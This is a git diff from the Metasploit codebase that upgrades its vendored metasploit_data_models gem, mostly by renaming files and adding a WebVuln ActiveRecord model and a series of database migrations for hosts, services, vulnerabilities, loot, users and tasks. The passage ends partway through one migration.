diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb
new file mode 100755
index 0000000000..4577818842
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb
@@ -0,0 +1,144 @@
+# A Web Vulnerability found during a web scan or web audit.
+#
+# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that
+# your patches are reloaded on each request in development mode for your Rails application.
+#
+# @example extending Mdm::WebVuln
+# # config/initializers/mdm_web_vuln.rb
+# ActiveSupport.on_load(:mdm_web_vuln) do
+# def confidence_percentage
+# "#{confidence}%"
+# end
+# end
+class Mdm::WebVuln < ActiveRecord::Base
+ #
+ # CONSTANTS
+ #
+
+ # A percentage {#confidence} that the vulnerability is real and not a false positive. 0 is not allowed because there
+ # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding.
+ CONFIDENCE_RANGE = 1 .. 100
+
+ # Allowed {#method methods}.
+ METHODS = [
+ 'GET',
+ # XXX I don't know why PATH is a valid method when it's not an HTTP Method/Verb
+ 'PATH',
+ 'POST'
+ ]
+
+ # {#risk Risk} is rated on a scale from 0 (least risky) to 5 (most risky).
+ RISK_RANGE = 0 .. 5
+
+ #
+ # Associations
+ #
+
+ belongs_to :web_site, :class_name => 'Mdm::WebSite'
+
+ #
+ # Attributes
+ #
+
+ # @!attribute [rw] blame
+ # Who to blame for the vulnerability
+ #
+ # @return [String]
+
+ # @!attribute [rw] category
+ # Category of this vulnerability.
+ #
+ # @return [String]
+
+ # @!attribute [rw] confidence
+ # Percentage confidence scanner or auditor has that this vulnerability is not a false positive
+ #
+ # @return [Integer] 1% to 100%
+
+ # @!attribute [rw] description
+ # Description of the vulnerability
+ #
+ # @return [String, nil]
+
+ # @!attribute [rw] method
+ # HTTP Methods for request that found vulnerability. 'PATH' is also allowed even though it is not an HTTP Method.
+ #
+ # @return [String]
+ # @see METHODS
+
+ # @!attribute [rw] name
+ # Name of the vulnerability
+ #
+ # @return [String]
+
+ # @!attribute [rw] path
+ # Path portion of URL
+ #
+ # @return [String]
+
+ # @!attribute [rw] payload
+ # Web audit payload that gets executed by the remote server. Used for code injection vulnerabilities.
+ #
+ # @return [String, nil]
+
+ # @!attribute [rw] pname
+ # Name of parameter that demonstrates vulnerability
+ #
+ # @return [String]
+
+ # @!attribute [rw] proof
+ # String that proves vulnerability, such as a code snippet, etc.
+ #
+ # @return [String]
+
+ # @!attribute [rw] query
+ # The GET query.
+ #
+ # @return [String]
+
+ # @!attribute [rw] request
+ #
+ # @return [String]
+
+ # @!attribute [rw] risk
+ # {RISK_RANGE Risk} of leaving this vulnerability unpatched.
+ #
+ # @return [Integer]
+
+ #
+ # Validations
+ #
+
+ validates :category, :presence => true
+ validates :confidence,
+ :inclusion => {
+ :in => CONFIDENCE_RANGE
+ }
+ validates :method,
+ :inclusion => {
+ :in => METHODS
+ }
+ validates :name, :presence => true
+ validates :path, :presence => true
+ validates :params, :presence => true
+ validates :pname, :presence => true
+ validates :proof, :presence => true
+ validates :risk,
+ :inclusion => {
+ :in => RISK_RANGE
+ }
+ validates :web_site, :presence => true
+
+ #
+ # Serializations
+ #
+
+ # @!attribute [rw] params
+ # Parameters sent as part of request
+ #
+ # @return [Array>] Array of parameter key value pairs
+ serialize :params, MetasploitDataModels::Base64Serializer.new
+
+ ActiveSupport.run_load_hooks(:mdm_web_vuln, self)
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb
new file mode 100755
index 0000000000..efda742476
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb
@@ -0,0 +1,79 @@
+class CreateTables < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :hosts do |t|
+ t.timestamp :created
+ t.string :address, :limit => 16 # unique
+ t.string :address6
+ t.string :mac
+ t.string :comm
+ t.string :name
+ t.string :state
+ t.string :info, :limit => 1024
+ t.string :os_name
+ t.string :os_flavor
+ t.string :os_sp
+ t.string :os_lang
+ t.string :arch
+ end
+
+ add_index :hosts, :address, :unique => true
+
+ create_table :clients do |t|
+ t.integer :host_id
+ t.timestamp :created
+ t.string :ua_string, :limit => 1024, :null => false
+ t.string :ua_name, :limit => 64
+ t.string :ua_ver, :limit => 32
+ end
+
+ create_table :services do |t|
+ t.integer :host_id
+ t.timestamp :created
+ t.integer :port, :null => false
+ t.string :proto, :limit => 16, :null => false
+ t.string :state
+ t.string :name
+ t.string :info, :limit => 1024
+ end
+
+ create_table :vulns do |t|
+ t.integer :host_id
+ t.integer :service_id
+ t.timestamp :created
+ t.string :name
+ t.text :data
+ end
+
+ create_table :refs do |t|
+ t.integer :ref_id
+ t.timestamp :created
+ t.string :name, :limit => 512
+ end
+
+ create_table :vulns_refs, :id => false do |t|
+ t.integer :ref_id
+ t.integer :vuln_id
+ end
+
+ create_table :notes do |t|
+ t.integer :host_id
+ t.timestamp :created
+ t.string :ntype, :limit => 512
+ t.text :data
+ end
+
+ end
+
+ def self.down
+ drop_table :hosts
+ drop_table :clients
+ drop_table :services
+ drop_table :vulns
+ drop_table :refs
+ drop_table :vulns_refs
+ drop_table :notes
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb
new file mode 100755
index 0000000000..e0d37098c2
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb
@@ -0,0 +1,35 @@
+class AddWmapTables < ActiveRecord::Migration
+ def self.up
+ create_table :wmap_targets do |t|
+ t.string :host # vhost
+ t.string :address, :limit => 16 # unique
+ t.string :address6
+ t.integer :port
+ t.integer :ssl
+ t.integer :selected
+ end
+
+ create_table :wmap_requests do |t|
+ t.string :host # vhost
+ t.string :address, :limit => 16 # unique
+ t.string :address6
+ t.integer :port
+ t.integer :ssl
+ t.string :meth, :limit => 32
+ t.text :path
+ t.text :headers
+ t.text :query
+ t.text :body
+ t.string :respcode, :limit => 16
+ t.text :resphead
+ t.text :response
+ t.timestamp :created
+ end
+ end
+
+ def self.down
+ drop_table :wmap_targets
+ drop_table :wmap_requests
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb
new file mode 100755
index 0000000000..9afe792ef5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb
@@ -0,0 +1,36 @@
+class AddWorkspaces < ActiveRecord::Migration
+
+ def self.up
+ create_table :workspaces do |t|
+ t.string :name
+ t.timestamps
+ end
+
+ change_table :hosts do |t|
+ t.integer :workspace_id, :required => true
+ end
+
+ remove_index :hosts, :column => :address
+
+ #
+ # This was broken after 018_add_workspace_user_info was introduced
+ # because of the new boundary column. For some reason, the
+ # find_or_create_by_name that .default eventually calls here tries to
+ # create a record with the boundary field that doesn't exist yet.
+ # See #1724
+ #
+ #w = Msf::DBManager::Workspace.default
+ #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id]
+ end
+
+ def self.down
+ drop_table :workspaces
+
+ change_table :hosts do |t|
+ t.remove :workspace_id
+ end
+
+ add_index :hosts, :address, :unique => true
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb
new file mode 100755
index 0000000000..3aedba8e20
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb
@@ -0,0 +1,20 @@
+class MoveNotes < ActiveRecord::Migration
+ def self.up
+ # Remove the host requirement. We'll add the column back in below.
+ remove_column :notes, :host_id
+ change_table :notes do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.integer :service_id
+ t.integer :host_id
+ end
+ end
+
+ def self.down
+ remove_column :notes, :workspace_id
+ remove_column :notes, :service_id
+ change_table :notes do |t|
+ t.integer :host_id, :null => false
+ end
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb
new file mode 100755
index 0000000000..a89d75281e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb
@@ -0,0 +1,16 @@
+class AddEventsTable < ActiveRecord::Migration
+ def self.up
+ create_table :events do |t|
+ t.integer :workspace_id
+ t.integer :host_id
+ t.timestamp :created_at
+ t.string :user
+ t.string :name
+ t.string :info
+ end
+ end
+ def self.down
+ drop_table :events
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb
new file mode 100755
index 0000000000..bd34021e11
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb
@@ -0,0 +1,58 @@
+class ExpandInfo < ActiveRecord::Migration
+ def self.up
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info, :limit => 4096
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 4096
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 4096
+ end
+ end
+
+ def self.down
+
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 1024
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 1024
+ end
+
+ remove_column :vulns, :data
+ change_table :hosts do |t|
+ t.string :data, :limit => 1024
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 1024
+ end
+
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb
new file mode 100755
index 0000000000..446a83aa29
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb
@@ -0,0 +1,26 @@
+
+# Adds 'created_at' and 'updated_at' columns to every primary table.
+#
+class AddTimestamps < ActiveRecord::Migration
+
+ @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests]
+ @@TABLES_NEEDING_CREATED_AT = [:wmap_targets]
+ @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets]
+
+ def self.up
+ @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at }
+
+ @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime }
+
+ @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime }
+ end
+
+ def self.down
+ @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created }
+
+ @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at }
+
+ @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at }
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb
new file mode 100755
index 0000000000..32786f8cfb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb
@@ -0,0 +1,20 @@
+class AddLoots < ActiveRecord::Migration
+
+ def self.up
+ create_table :loots do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.integer :host_id
+ t.integer :service_id
+ t.string :ltype, :limit => 512
+ t.string :path, :limit => 1024
+ t.text :data
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :loots
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb
new file mode 100755
index 0000000000..4cc32cc6e4
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb
@@ -0,0 +1,16 @@
+class CreateUsers < ActiveRecord::Migration
+ def self.up
+ create_table :users do |t|
+ t.string :username
+ t.string :crypted_password
+ t.string :password_salt
+ t.string :persistence_token
+
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :users
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb
new file mode 100755
index 0000000000..0aad1366fb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb
@@ -0,0 +1,10 @@
+class AddLootsCtype < ActiveRecord::Migration
+ def self.up
+ add_column :loots, :content_type, :string
+ end
+
+ def self.down
+ remove_column :loots, :content_type
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb
new file mode 100755
index 0000000000..f99dd68d32
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb
@@ -0,0 +1,16 @@
+class AddAlertFields < ActiveRecord::Migration
+ def self.up
+ add_column :notes, :critical, :boolean
+ add_column :notes, :seen, :boolean
+ add_column :events, :critical, :boolean
+ add_column :events, :seen, :boolean
+ end
+
+ def self.down
+ remove_column :notes, :critical
+ remove_column :notes, :seen
+ remove_column :events, :critical
+ remove_column :events, :seen
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb
new file mode 100755
index 0000000000..2f16e8b70d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb
@@ -0,0 +1,19 @@
+class AddReports < ActiveRecord::Migration
+
+ def self.up
+ create_table :reports do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :created_by
+ t.string :rtype
+ t.string :path, :limit => 1024
+ t.text :options
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :reports
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb
new file mode 100755
index 0000000000..39004c821e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb
@@ -0,0 +1,24 @@
+class AddTasks < ActiveRecord::Migration
+
+ def self.up
+ create_table :tasks do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :created_by
+ t.string :module
+ t.datetime :completed_at
+ t.string :path, :limit => 1024
+ t.string :info
+ t.string :description
+ t.integer :progress
+ t.text :options
+ t.text :error
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :tasks
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb
new file mode 100755
index 0000000000..bf01c7afb8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb
@@ -0,0 +1,10 @@
+class AddTasksResult < ActiveRecord::Migration
+ def self.up
+ add_column :tasks, :result, :text
+ end
+
+ def self.down
+ remove_column :tasks, :result
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb
new file mode 100755
index 0000000000..616d8c96be
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb
@@ -0,0 +1,12 @@
+class AddLootsFields < ActiveRecord::Migration
+ def self.up
+ add_column :loots, :name, :text
+ add_column :loots, :info, :text
+ end
+
+ def self.down
+ remove_column :loots, :name
+ remove_column :loots, :info
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb
new file mode 100755
index 0000000000..7934a0f423
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb
@@ -0,0 +1,16 @@
+class RenameUser < ActiveRecord::Migration
+ def self.up
+ remove_column :events, :user
+ change_table :events do |t|
+ t.string :username
+ end
+ end
+
+ def self.down
+ remove_column :events, :username
+ change_table :events do |t|
+ t.string :user
+ end
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb
new file mode 100755
index 0000000000..1e2827801e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb
@@ -0,0 +1,10 @@
+class AddHostPurpose < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :purpose, :text
+ end
+
+ def self.down
+ remove_column :hosts, :purpose
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb
new file mode 100755
index 0000000000..cee6fd8d3b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb
@@ -0,0 +1,58 @@
+class ExpandInfo2 < ActiveRecord::Migration
+ def self.up
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info, :limit => 65536
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 65536
+ end
+
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :data, :limit => 65536
+ end
+
+ remove_column :hosts, :info
